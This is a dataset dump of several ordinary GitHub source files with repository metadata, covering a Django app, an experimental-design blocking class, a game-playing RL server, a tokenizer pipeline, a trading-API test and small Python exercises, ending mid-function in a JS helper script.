blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 246
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca533f2d101a318a97772ebfb27bef0b60460aa2 | a82961498421f8dbc6ed15ba7c22d82763b85e95 | /rides_handling/migrations/0019_auto_20180514_1703.py | 0ec616da15661531563117745b8860da2fc9c0a5 | [
"MIT"
] | permissive | EverythingWorks/Unter | f7ae61c33f66ec37b48a3e2f86dfa6f5d9edd9f2 | a03b4c8fc5cc77095021b9b504ea6c00de8a5a18 | refs/heads/master | 2020-03-10T07:25:56.055846 | 2018-06-04T04:22:21 | 2018-06-04T04:22:21 | 129,262,544 | 4 | 1 | MIT | 2018-05-29T14:03:35 | 2018-04-12T14:17:22 | Jupyter Notebook | UTF-8 | Python | false | false | 747 | py | # Generated by Django 2.0.4 on 2018-05-14 17:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration (Django 2.0.4).

    Adds Ride.estimated_trip_time and makes Ride.driver nullable.
    """

    dependencies = [
        ('rides_handling', '0018_auto_20180512_0937'),
    ]

    operations = [
        # preserve_default=False: the default of 0 is only used to back-fill
        # existing rows during this migration, not kept on the model.
        migrations.AddField(
            model_name='ride',
            name='estimated_trip_time',
            field=models.DecimalField(decimal_places=6, default=0, max_digits=9),
            preserve_default=False,
        ),
        # Driver may now be unset (ride not yet accepted); deleting the
        # Profile cascades to its rides.
        migrations.AlterField(
            model_name='ride',
            name='driver',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='driver', to='rides_handling.Profile'),
        ),
    ]
| [
"danpisq@gmail.com"
] | danpisq@gmail.com |
f6d5899459cd4b1b222d2d880badb5acd97d8ffb | ee82b3b34449187dc34ac22afa49d490b8f94831 | /design/optblock.py | 1622f3770f44d819e43c3a4b4b6a06f08c4e6328 | [
"MIT"
] | permissive | raddanki/softblock | 2d16c0acbcdfbf969f489ab5a832e55c15ec4cc7 | 25f1ed61a0ab4c377e0b57546b57287bb90667bf | refs/heads/master | 2023-04-05T03:08:00.549190 | 2021-04-26T13:27:45 | 2021-04-26T13:27:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,015 | py | #! /usr/bin/python3
from sklearn.neighbors import DistanceMetric
import numpy as np
from .nbpMatch import nbpwrap
from .design import Design
class OptBlock(Design):
    """Optimal blocked design via non-bipartite matching.

    Pairs experimental units so that within-pair covariate distance is
    minimised, then assigns treatment within each block.
    """

    def __init__(self, treatment_prob: float = 0.5):
        # Marginal probability of treatment used when splitting each block.
        self.treatment_prob = treatment_prob
        super(OptBlock, self).__init__()

    def fit(self, X: np.ndarray, distance="mahalanobis") -> None:
        """Compute pairwise blocks of the rows of X.

        With an odd number of units, one unit is dropped at random from the
        matching and afterwards appended to the block of its nearest
        neighbour, producing a single block of three.
        """
        N = X.shape[0]
        if N % 2 == 1:
            # The matcher needs an even count; temporarily ignore one unit.
            idx_ignore = np.random.choice(N, 1).item()
        else:
            idx_ignore = None
        self.X = X
        if distance == "mahalanobis":
            # pinv tolerates a singular covariance (e.g. collinear columns).
            inv_cov = np.linalg.pinv(np.cov(X, rowvar=False))
            dist_maker = DistanceMetric.get_metric("mahalanobis", VI=inv_cov)
        elif distance == "euclidean":
            dist_maker = DistanceMetric.get_metric("euclidean")
        else:
            raise NotImplementedError(
                "Only Mahalanobis and Euclidean distance are implemented."
            )
        distances = dist_maker.pairwise(X)
        if idx_ignore is not None:
            # Locate the ignored unit's nearest neighbour before dropping
            # its row/column from the distance matrix.
            dist_ignore = distances[idx_ignore, :]
            dist_ignore[idx_ignore] = np.inf
            idx_nn = np.argmin(dist_ignore)
            distances = np.delete(np.delete(distances, idx_ignore, 0), idx_ignore, 1)
        n_to_pass = N if idx_ignore is None else N - 1
        self.matches = nbpwrap(wt=distances.T.reshape(-1), n=n_to_pass)
        # nbpwrap indexes from 1.
        self.matches = self.matches - 1
        # Each pair appears twice in `matches`; sorting each (i, match) tuple
        # and collecting into a set keeps one copy per pair.
        blocks = {tuple(sorted(x)) for x in enumerate(self.matches)}
        self.blocks = [list(block) for block in blocks]
        self.block_membership = np.array([-1] * N)
        for block_id, block in enumerate(blocks):
            for member_idx, member in enumerate(block):
                if idx_ignore is not None:
                    # Members are indices into the reduced matrix; shift them
                    # back past the ignored position and re-attach the ignored
                    # unit to its nearest neighbour's block.
                    # NOTE(review): idx_nn was computed in the ORIGINAL
                    # indexing while `member` is in the reduced indexing, so
                    # the comparison may be off by one when idx_nn > idx_ignore
                    # -- TODO confirm.
                    if member == idx_nn:
                        self.blocks[block_id].append(idx_ignore)
                        self.block_membership[idx_ignore] = block_id
                    if member >= idx_ignore:
                        self.block_membership[member+1] = block_id
                        self.blocks[block_id][member_idx] = member + 1
                else:
                    self.block_membership[member] = block_id

    def assign(self, X: np.ndarray) -> np.ndarray:
        """Return a 0/1 treatment vector for the fitted sample.

        Only in-sample assignment is supported: X must be None or the very
        array object passed to fit().
        """
        if X is None:
            X = self.X
        elif X is self.X:
            # NOTE(review): identity (not equality) check -- an equal copy of
            # the training matrix is rejected below. Confirm this is intended.
            pass
        else:
            raise ValueError("Can't go out of sample here.")
        N = X.shape[0]
        A = np.array([0] * N)
        for block in self.blocks:
            M = len(block)
            # Expected number treated; guarantee at least one treated and one
            # control per block, and randomise any leftover slot (blocks of 3).
            En_trt = M * self.treatment_prob
            n_trt = int(max(1, np.floor(En_trt)))
            n_ctl = int(max(1, np.floor(M - En_trt)))
            n_extra = int(np.floor(M - n_trt - n_ctl))
            a_extra = int(np.random.choice([0, 1], 1).item())
            n_trt += a_extra * n_extra
            trted = np.random.choice(M, n_trt, replace=False)
            for unit in trted:
                A[block[unit]] = 1
        return A
| [
"arbour@Davids-MacBook-Pro.local"
] | arbour@Davids-MacBook-Pro.local |
e048ecf2bf1cfedf302f50a696e79ffb86f316b1 | db5f9683e06afffb1657b3919d302af4eb1c0b2a | /miscellaneous/infomaterial/create_state/main.py | aa8c08dce913169c02dad351c576de4fccd2ffc4 | [
"MIT"
] | permissive | Birkenpapier/informaticup21 | a071e515acac8a60d5cd0fe3d4918fcbf21e3f04 | 193ff04be765dc5f11206f75eb3225cfeb94eb87 | refs/heads/master | 2023-03-25T17:51:36.380575 | 2021-01-17T19:24:14 | 2021-01-17T19:24:14 | 352,364,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,280 | py | import make_decision as make_d
import pylogging as IC20log
import tensorflow as tf
import numpy as np
import time
import os
from bottle import post, request, run, BaseRequest
from keras.utils import to_categorical
from drl_agent.DQN import DQNAgent
from create_training_data import *
from random import randint
from game_state import *
from PIL import Image
# Module-level episode state shared across request handler invocations.
init_action = None   # action returned for round 1 (reused in round 2)
state_init1 = None   # first observed state (set by init_game)
state_init2 = None   # second observed state (set by init_game_next)
state_old = None     # previous state stored into the replay memory
counter_games = 0    # number of finished games; drives epsilon decay
# NOTE(review): this rebinds the imported class name `game_state` to its
# singleton instance -- the class cannot be constructed again afterwards.
game_state = game_state()
agent = DQNAgent()
def reward_function(game):
    """Map the posted game state to a scalar RL reward.

    Round 1 is always worth 0; afterwards the outcome decides:
    pending -> 1, win -> 20, loss -> -20 (anything else -> None).
    """
    if game["round"] == 1:
        return 0
    outcome = game["outcome"]
    if outcome == 'pending':
        return 1  # + game["population_reduction"] * 3
    if outcome == 'win':
        return 20
    if outcome == 'loss':
        return -20
def init_game(game):
    """Remember the very first game state and return a no-op init action."""
    global state_init1
    state_init1 = game
    # 12-slot action vector; only slot 6 is set, i.e. no changes or moves.
    noop_action = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
    return noop_action
def init_game_next(game_json, game, action):
    """Store the first transition (state_init1, action, reward) in replay memory."""
    global state_init1
    global state_init2
    state_init2 = game
    reward1 = reward_function(game_json)
    # Terminal exactly when the reward hits one of the win/loss extremes.
    done = reward1 in (20, -20)
    agent.remember(state_init1, action, reward1, done)
@post("/")
def index():
global init_action
global counter_games
global state_old
game = request.json
print(f'-----------------------> round: {game["round"]}, outcome: {game["outcome"]}')
game_state.update_state(game)
if game is not None:
state = create_save_TD(game_state)
try:
if game["round"] == 1:
init_action = init_game(state)
init_action = {"type": "endRound"}
return init_action
if game["round"] == 2:
init_action_next = init_game_next(game, state, init_action)
# TODO here comes the answer from the agent
except Exception as e:
IC20log.getLogger("Index").error(str(e))
# print(f"this is the action: {action}")
agent.epsilon = 80 - counter_games
try:
state_old = np.hstack(state) # how to safe the old state after the call of the method?
# perform random actions based on agent.epsilon, or choose the action
if randint(0, 200) < agent.epsilon:
final_move = to_categorical(randint(0, 11), num_classes=12)
print(f"final_move based random: {final_move}")
else:
# predict action based on the old state
state_old = np.hstack(state)
prediction = agent.model.predict(state_old.reshape((1, 4450)))
final_move = to_categorical(np.argmax(prediction[0]), num_classes=12)
print(f"final_move based prediction: {final_move}")
# perform new move and get new state
state_new = np.hstack(state)
# set reward for the new state
reward = reward_function(game)
except Exception as e:
IC20log.getLogger("Index").error(str(e))
done = None
if reward == 20 or reward == -20:
done = True
else:
done = False
# store the new data into a long term memory
agent.remember(state_old, final_move, reward, done)
if game["outcome"] == 'loss' or game["outcome"] == 'win':
counter_games += 1
elif game["outcome"] == 'win':
img = Image.open('./data/hiclipart.png')
img.show()
# saving the trained model
if counter_games == 20:
agent.model.save_weights('weights.hdf5')
counter_games += 1
print(f"counter_games: {counter_games}")
action = make_d.Action.create_Action(game_state, final_move)
return action
if __name__ == '__main__':
    port = 50123
    # Workaround for a CUDA/TensorFlow incompatibility: hide all GPU devices
    # so TF falls back to the CPU.
    # os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
    os.environ['CUDA_VISIBLE_DEVICES'] = ''
    if tf.test.gpu_device_name():
        print('[DEBUG] GPU found')
    else:
        print("[DEBUG] No GPU found")
    # end of workaround
    IC20log.getLogger("Server Main").info("starting server at Port %s" % port )
    # Allow request bodies up to 10 MiB (posted game states are large).
    BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
    run(host="0.0.0.0", port=port, quiet=True)
"kevin@peivareh.com"
] | kevin@peivareh.com |
76063ba8a654410eb9a78179fbe0b90a12bb85ad | 32a0cb40ad22c725f41984d8d234589bdd4cb58f | /module_3/tasks/re_1.py | a79e75aed30ef0f4cf1be51358aa3f18fa714ae8 | [] | no_license | egolov/stepic-python | 2ef7b201d47dc73388b61a01fb864ec978b8d1d2 | c160c9ef752c0a4dd82217917909ee5547a1e583 | refs/heads/master | 2020-03-20T02:15:07.400710 | 2018-06-12T17:20:49 | 2018-06-12T17:20:49 | 137,105,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import re
# occurrence of 'cat' more than two times
# NOTE(review): pattern_1 actually requires at least TWO occurrences of
# 'cat' (not more than two) -- the comment and pattern disagree.
pattern_1 = r".*cat.*cat"
pattern_2 = r"cat"
print(re.match(pattern_1, "abc cat and cat abc")) # is not None
print(re.findall(pattern_2, "abc cat and cat abc")) # len() > 1
| [
"e-golov@yandex-team.ru"
] | e-golov@yandex-team.ru |
bf81381a68065e4e52ed4a7600692ef8632e9a7c | d076d75093b374418b5704703f841623344c0a82 | /Tokenizer/make_tokenizer.py | c02073ccd07173d25698296a1b1dcac4630d2499 | [] | no_license | sangHa0411/BERT | db1e3284ed22927fc2f19e819a5946b634c9bacf | cb272f94d77770b9b29d7493238e5ea1c5554420 | refs/heads/main | 2023-08-28T14:20:31.398036 | 2021-10-19T01:25:06 | 2021-10-19T01:25:06 | 417,094,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,996 | py | import os
import re
import sys
import argparse
from tqdm import tqdm
from nltk.tokenize import sent_tokenize
from konlpy.tag import Mecab
def train(args) :
    """End-to-end tokenizer pipeline.

    Loads Korean newspaper JSON, extracts and sentence-splits the text,
    cleans each sentence, writes the corpus to disk and trains a
    SentencePiece tokenizer on it.
    """
    sys.path.append('../')
    # Project-local modules live one directory up.
    from tokenizer import write_data, train_spm
    from loader import get_data, preprocess_data
    from preprocessor import SenPreprocessor
    print('Get Newspaper Data')
    data = get_data(args.data_dir, args.file_size)
    print('Extract Text Data')
    text_data = []
    for json_data in tqdm(data) :
        text_list = preprocess_data(json_data)
        text_data.extend(text_list)
    print('Tokenizing Data')
    sen_data = []
    for text in tqdm(text_data) :
        sen_list = sent_tokenize(text)
        sen_data.extend(sen_list)
    print('Size of Sentence Data : %d \n' %len(sen_data))
    print('Preprocessing Data')
    mecab = Mecab()
    sen_preprocessor = SenPreprocessor(mecab)
    sen_preprocessed = []
    for sen in tqdm(sen_data) :
        # Skip overly long sentences entirely.
        if len(sen) > args.max_size :
            continue
        sen = sen_preprocessor(sen)
        # The preprocessor signals rejection by returning None.
        if sen != None :
            sen_preprocessed.append(sen)
    print('Write Text Data')
    text_path = os.path.join(args.tokenizer_dir, 'kor_newspaper.txt')
    write_data(sen_preprocessed, text_path)
    print('Train Tokenizer')
    train_spm(text_path, os.path.join(args.tokenizer_dir, 'tokenizer'), args.token_size)
if __name__ == '__main__' :
    # CLI arguments: data location plus tokenizer hyper-parameters.
    parser = argparse.ArgumentParser()
    parser.add_argument('--data_dir', type=str, default='../../Data', help='Korean Newspaper Data directory')
    parser.add_argument('--max_size', type=int, default=256, help='max length of sentence')
    parser.add_argument('--file_size', type=int, default=30, help='size of newspaper file')
    parser.add_argument('--tokenizer_dir', type=str, default='./', help='File Writing Directory')
    parser.add_argument('--token_size', type=int, default=35000, help='Token Size (default: 35000)')
    args = parser.parse_args()
    train(args)
| [
"noreply@github.com"
] | sangHa0411.noreply@github.com |
053950d8dee6b200c63e069154c6d9c6ba7b21af | 02442f7d3bd75da1b5b1bf6b981cc227906a058c | /rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py | 3de9876b63c7300094cd88e5c7d2b10e59c73d88 | [] | no_license | facaisdu/RaspRobot | b4ff7cee05c70ef849ea4ee946b1995432a376b7 | e7dd2393cdabe60d08a202aa103f796ec5cd2158 | refs/heads/master | 2020-03-20T09:09:28.274814 | 2018-06-14T08:51:46 | 2018-06-14T08:51:46 | 137,329,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated catkin pkg-config context for the devel space.
# Do not edit by hand; regenerate with catkin instead.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []  # always [] for this package
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []  # always [] for this package
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
| [
"facai_sdu@126.com"
] | facai_sdu@126.com |
02d4497caa6522455555c81d2715262be07fb67f | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_24610.py | ed0905d8047a088ab943cc1e32bc4dbc7d30b821 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | # Why int() argument must be a string or a number, not 'list'?
PForm
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
69991130e0c5ea9538a163c831d2b0caa0fd1571 | 8c5f5cf4ef550062d5511dd848d250b4f54918dd | /krishna/settings.py | 7956897358d0b28eb652179b32ba4c6438fb3f22 | [] | no_license | krishnagopaldubey/fuzzysearchwithgetmethod | af18c9c1834e0a367e1eb3ff5454ea946fb01376 | 116589b684e78e5d0c4f8f05fcd0d83a2ba3e9c6 | refs/heads/master | 2020-08-12T06:56:51.493043 | 2019-10-12T20:34:27 | 2019-10-12T20:34:27 | 214,711,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,125 | py | """
Django settings for krishna project.
Generated by 'django-admin startproject' using Django 2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and
# load from the environment before any production deployment.
SECRET_KEY = '&cv==od%vopf$i^i!lces9u1^(303y)0jezopp!3p!6qqsg&*s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list: with DEBUG=True Django only serves localhost-style hosts.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'polls',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'krishna.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'krishna.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# Default development database: file-backed SQLite in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"krishna@dolphinfoundry.com"
] | krishna@dolphinfoundry.com |
5c9f9ce0e28a0947dd8edbcea57820ca55c76184 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py | 57c5b458804546c0a77bf642879eaa200c682c30 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
    """XTP order test: STAR-market sell via best-5-or-limit after a Shanghai
    quote-gateway restart (expects a full fill)."""

    def setUp(self):
        #sql_transfer = SqlData_Transfer()
        #sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
        #clear_data_and_restart_all()
        #Api.trade.Logout()
        #Api.trade.Login()
        pass
    #
    def test_YCHF_KCBYCHF_SHBP_153(self):
        title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
        # Define the expected values for this test case.
        # Expected status is one of: initial, unfilled, partially filled,
        # fully filled, partial-cancel reported, partially cancelled,
        # reported pending cancel, cancelled, rejected, cancel-rejected,
        # internal cancel.
        # xtp_ID and cancel_xtpID default to 0 and need not be changed.
        case_goal = {
            '期望状态': '全成',
            'errorID': 0,
            'errorMSG': queryOrderErrorMsg(0),
            '是否生成报单': '是',
            '是否是撤废': '否',
            # '是否是新股申购': '',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Define the order parameters ------------------------------------------
        # Params: ticker, market, security type, security status, trading
        # status, side (B = buy, S = sell), expected status, Api.
        stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails.
        if stkparm['返回结果'] is False:
            rs = {
                '报单测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            print(stkparm['错误原因'])
            self.assertEqual(rs['报单测试结果'], True)
        else:
            wt_reqs = {
                'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
                'order_client_id':5,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
                'price': stkparm['涨停价'],
                'quantity': 300,
                'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
            }
            rs = serviceTest(Api, case_goal, wt_reqs)
            logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
                           + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
        ## restore available funds
        #sql_transfer = SqlData_Transfer()
        #sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
        #oms_restart()
        self.assertEqual(rs['报单测试结果'], True)  # 211
if __name__ == '__main__':
    # Run this test case directly.
    unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
4c1da163636e9dd3c700a82633474e2178f8f902 | 16234b1ac9e2e2cb64c2e44dfb938525046a0d33 | /tests/test_vispy_plot.py | add3abf99799d98b6e7d8345985a7738a940b24c | [
"MIT"
] | permissive | cmsteinBR/FlatCAM | 8c0b41e2ea63a7c942c77cd1e4fc286b7b99da93 | f6e492916776384bdf3af28367679c2ae02c926a | refs/heads/master | 2021-01-18T00:22:07.056830 | 2016-08-04T16:08:55 | 2016-08-04T16:08:55 | 66,869,807 | 1 | 0 | null | 2016-08-29T18:32:44 | 2016-08-29T18:32:42 | Python | UTF-8 | Python | false | false | 1,660 | py | import sys
import unittest
from PyQt4 import QtGui, QtCore
from FlatCAMApp import App
from VisPyPatches import apply_patches
import random
import logging
class VisPyPlotCase(unittest.TestCase):
    """
    This is a top-level test covering the Gerber-to-GCode
    generation workflow.
    THIS IS A REQUIRED TEST FOR ANY UPDATES.
    """

    # Candidate project files; each iteration opens one chosen at random.
    filenames = ['test', 'test1', 'test2', 'test3', 'test4']

    def setUp(self):
        # A QApplication must exist before any Qt widgets are created.
        self.app = QtGui.QApplication(sys.argv)
        apply_patches()
        # Create App, keep app defaults (do not load
        # user-defined defaults).
        self.fc = App()
        self.fc.log.setLevel(logging.ERROR)

    def tearDown(self):
        del self.fc
        del self.app

    def test_flow(self):
        # Repeatedly open random projects and wait until plotting finishes.
        for i in range(100):
            print "Test #", i + 1
            # Open test project
            self.fc.open_project('tests/project_files/' + self.filenames[random.randint(0, len(self.filenames) - 1)])
            print "Project", self.fc.project_filename
            # Wait for project loaded and plotted
            while True:
                self.sleep(500)
                if self.fc.proc_container.view.text.text() == 'Idle.' or self.fc.ui.isHidden():
                    break
            # Interrupt on window close
            if self.fc.ui.isHidden():
                break
            # Create new project and wait for a random time
            self.fc.on_file_new()
            self.sleep(random.randint(100, 1000))

    def sleep(self, time):
        # Pump the Qt event loop for `time` milliseconds (non-blocking sleep).
        # NOTE(review): the parameter shadows the stdlib `time` module name.
        timer = QtCore.QTimer()
        el = QtCore.QEventLoop()
        timer.singleShot(time, el, QtCore.SLOT("quit()"))
        el.exec_()
| [
"denis_vic@mail.ru"
] | denis_vic@mail.ru |
05c42897a43ef1cd339385cd1d08994c838bd27a | 454de23b97631718c7c7795fdef14881e5758d22 | /Unit 3/fileIO.py | f523092c0042ed435999e78fc9b1e02607f2f1cd | [] | no_license | dhruv3/IntroToPython | 0ac7ab132abd89eb99e86dd62ccc884f454d2701 | 620d05269f33a1f8003986af87cb956b217359ec | refs/heads/master | 2021-01-22T05:43:18.095945 | 2017-05-18T13:30:35 | 2017-05-18T13:30:35 | 81,695,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | #
# File I/O examples.
#
# Method 1: explicit open / read / close
infile = 'testTextFile.txt'
f = open(infile, 'r')
data = f.read()
f.close()
print(data)
# len gives the total number of characters in the string
print(len(data))
# clean the data: strip double quotes, then split on ", "
data = data.replace('"', '')
dataList = data.split(', ')
print(dataList)
print(len(dataList))
# Method 2: a context manager closes the file automatically
with open("testNum.txt", "r") as f:
    for line in f:
        print(line)
# write to a file
of = open("newOPFile.txt", "w")
with open("testNum.txt", "r") as f:
    for line in f:
        tempStr = line;
        of.write(tempStr)
of.close()
# If we don't close the output file we may never see the data on disk:
# the data we "wrote" stays buffered in RAM and is only flushed to the
# hard drive when the file is closed.
| [
"dhruv.mnit@gmail.com"
] | dhruv.mnit@gmail.com |
6eda11f72415c2c9a36b7f5635e2560ef63bf01a | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py | ff49a4e872dad3cb97afe62d31f086a25e90d3e8 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | from gPhoton.gAperture import gAperture
def main():
    """Extract an NUV light curve for sdB_pg_1318+062 using gPhoton gAperture."""
    # Aperture radius/annulus are in degrees; 30 s time bins; gaps > 1000 s split the curve.
    gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)

if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
6e366b23ce962f4acf818615c993eb9f30b28562 | d8f44692c9f9f0a9a391a49db0f4f659a2ef6fe8 | /jsBuilds/jsSupport.py | 4817320de831b302adb53f3eddacb01f0fbe8e4b | [
"MIT"
] | permissive | skylarkgit/sql2phpclass | 045e71963574b719313fc98882f5c710435f101f | a79e7f3cfda8cb41ba00e8cbba0de33e9be759d6 | refs/heads/master | 2020-03-19T02:34:34.229287 | 2018-07-04T18:58:28 | 2018-07-04T18:58:28 | 135,640,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py | import sys
sys.path.append('..')
from jsBuilds.jsTemplates import *
def args(varList):
    """Join variable names into a comma-separated JS argument list."""
    separator = ','
    return separator.join(varList)
def reqData(varList):
    """Build a JS url-encoded body expression: "a="+obj.a+"&"+"b="+obj.b ...

    BUGFIX: the generated snippet was missing the `+` between the "name="
    string literal and obj.<name>, producing invalid JavaScript
    ("a="obj.a instead of "a="+obj.a). The +"&"+ join separator shows the
    intended concatenation pattern.
    """
    return '+"&"+'.join('"' + x + '="+obj.' + x for x in varList)
def objFormation(varlist):
    """Build a JS object-literal body: name:$scope.name,... for each variable.

    BUGFIX: the body referenced the undefined name `varList` while the
    parameter is spelled `varlist`, so every call raised NameError.
    """
